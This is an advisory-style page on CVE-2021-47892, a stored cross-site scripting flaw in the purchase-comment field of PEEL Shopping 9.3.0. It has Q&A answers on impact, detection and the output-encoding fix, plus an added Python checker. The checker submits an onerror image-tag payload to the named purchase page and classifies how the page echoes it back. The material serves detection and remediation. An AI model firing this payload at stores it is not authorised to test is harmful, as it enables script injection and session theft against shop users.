CVE-2021-47892
Stored XSS in PEEL Shopping 9.3.0 Purchase Comments Allows Script Execution
Publication date: 2026-01-23
Last updated on: 2026-01-23
Assigner: VulnCheck
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| peel | shopping | 9.3.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47892 is a stored cross-site scripting (XSS) vulnerability in PEEL Shopping version 9.3.0. It is in the 'Comments / Special Instructions' field on the purchase page, where an attacker can submit arbitrary JavaScript. The payload is stored server-side and runs in the browser of anyone who loads (for example, refreshes) the page that renders the comment, giving the attacker client-side script execution in the store's origin. [1, 2]
How can this vulnerability impact me?
This vulnerability lets an attacker execute JavaScript of their choosing in the origin of the affected store. That can lead to theft of session cookies or credentials, session hijacking, page defacement, or actions performed on the victim's behalf. Because the payload is stored rather than reflected, no crafted link is needed: it fires for every user whose browser renders the stored comment, each time the page is loaded. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection is a controlled test rather than a network-wide scan. First confirm that the installed PEEL Shopping version is 9.3.0, then submit a test payload in the 'Comments / Special Instructions' field of the purchase page at `/achat/achat_maintenant.php`. Build the payload on an event handler such as `onload` or `onerror` (not only a `<script>` tag, which a naive filter might strip), include a random marker string so you can recognise your own submission, and reload the page. If the marker comes back inside a live tag or attribute rather than HTML-encoded (`&lt;`, `&gt;`, `&quot;`), the stored XSS is present. The exact command depends on your tooling, but a typical approach is a `curl` POST of form data to the purchase page, with the payload in the comment field and the session cookie attached, followed by a GET of the same page whose response you inspect for the unencoded payload. Note that the advisory names the field only by its on-screen label; take the real form parameter name from the page's HTML. [1]
What immediate steps should I take to mitigate this vulnerability?
The root-cause fix is context-aware output encoding: every time the stored comment is rendered into the page, HTML-encode it (in PHP, `htmlspecialchars($comment, ENT_QUOTES, 'UTF-8')`) so injected markup is displayed as text rather than parsed. Input validation on the 'Comments / Special Instructions' field (length limits, rejecting angle brackets where a free-text comment does not need them) is worthwhile defence in depth but not a substitute, since the same stored value may be rendered in more than one place. Web application firewall rules that block common XSS patterns can buy time, and marking session cookies `HttpOnly` plus deploying a Content Security Policy limits what a successful injection can do. Update PEEL Shopping to a release in which the issue is fixed as soon as one is available; until then, disable or restrict the vulnerable input field. [2]
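The following is an added example illustrating both the detection procedure and the output-encoding fix described in the two answers above; it is not code from PEEL Shopping or from the advisory. It builds a canary payload with a random marker, classifies how a page reflects it (live tag, HTML-encoded, partially filtered, or absent), and includes a constructed stand-in page so the logic runs offline. The form field name `commentaires`, the assumption that the purchase page echoes the stored comment on a plain GET, and the cookie handling in `probe()` are assumptions, not facts from the advisory. Only point `probe()` at a system you are authorised to test.

```python
"""Checker for a stored XSS in a purchase-page comment field (CVE-2021-47892 pattern).

Added example; this is not code from PEEL Shopping or from the advisory.
Assumptions are marked ASSUMPTION. Only point it at a system you are
authorised to test.
"""
import html
import secrets
import sys
import urllib.parse
import urllib.request

PURCHASE_PATH = "/achat/achat_maintenant.php"  # page named in the advisory
# ASSUMPTION: the HTML name attribute of the "Comments / Special Instructions"
# input. The advisory gives only the label; read the real name from the form.
COMMENT_FIELD = "commentaires"


def build_canary(token=None):
    """Return (token, payload).

    The random token ties a hit to *this* test run rather than to stale data
    someone else stored earlier. An event-handler payload is used, as the
    advisory describes, so a filter that only strips <script> does not hide
    the problem.
    """
    token = token or secrets.token_hex(6)
    payload = f'"><img src=x onerror=alert("{token}")>'
    return token, payload


def encode_for_html(text):
    """The output-encoding fix: escape &, <, >, " and ' before the value is
    placed in HTML text or a quoted attribute. This is the equivalent of
    PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), which is what the code
    rendering the comment should call."""
    return html.escape(text, quote=True)


def classify_reflection(body, token):
    """Classify how the stored comment came back in `body`.

    'vulnerable' - the live <img ... onerror=...> tag is present verbatim
    'encoded'    - only an HTML-entity-escaped copy is present (safe)
    'filtered'   - the token survived but the tag was mangled: inspect by hand
    'absent'     - nothing of the submission is on the page
    """
    _, payload = build_canary(token)
    live_tag = f'<img src=x onerror=alert("{token}")>'
    if live_tag in body:
        return "vulnerable"
    if encode_for_html(payload) in body:
        return "encoded"
    if token in body:
        return "filtered"
    return "absent"


def render_page(comment, encoded):
    """Constructed stand-in for the purchase page echoing a stored comment.

    encoded=False mimics the raw echo the advisory reports for 9.3.0;
    encoded=True shows the same page after the output-encoding fix.
    """
    shown = encode_for_html(comment) if encoded else comment
    return (
        "<html><body>"
        f'<form><textarea name="{COMMENT_FIELD}"></textarea></form>'
        f'<p class="comment">{shown}</p>'
        "</body></html>"
    )


def probe(base_url, token, payload, field=COMMENT_FIELD, cookie=None):
    """Submit the payload, re-fetch the page (the 'refresh' step) and classify.

    ASSUMPTION: the page echoes the stored comment on a GET of the same path,
    and any session cookie the shop requires is supplied in `cookie`.
    """
    url = base_url.rstrip("/") + PURCHASE_PATH
    headers = {"Cookie": cookie} if cookie else {}
    data = urllib.parse.urlencode({field: payload}).encode()
    urllib.request.urlopen(urllib.request.Request(url, data=data, headers=headers), timeout=10).read()
    raw = urllib.request.urlopen(urllib.request.Request(url, headers=headers), timeout=10).read()
    return classify_reflection(raw.decode("utf-8", "replace"), token)


if __name__ == "__main__":
    token, payload = build_canary()
    if len(sys.argv) > 1:
        cookie = sys.argv[2] if len(sys.argv) > 2 else None
        print(probe(sys.argv[1], token, payload, cookie=cookie))
    else:
        # Offline demonstration against the constructed page.
        print("raw echo     ->", classify_reflection(render_page(payload, encoded=False), token))
        print("encoded echo ->", classify_reflection(render_page(payload, encoded=True), token))
```

Run it with no arguments to see the vulnerable and fixed renderings classified side by side; pass a base URL (and optionally a session cookie) to run the live check. A result of `filtered` means some neutralisation is in place but the page is not cleanly encoding the value, which still deserves a manual look.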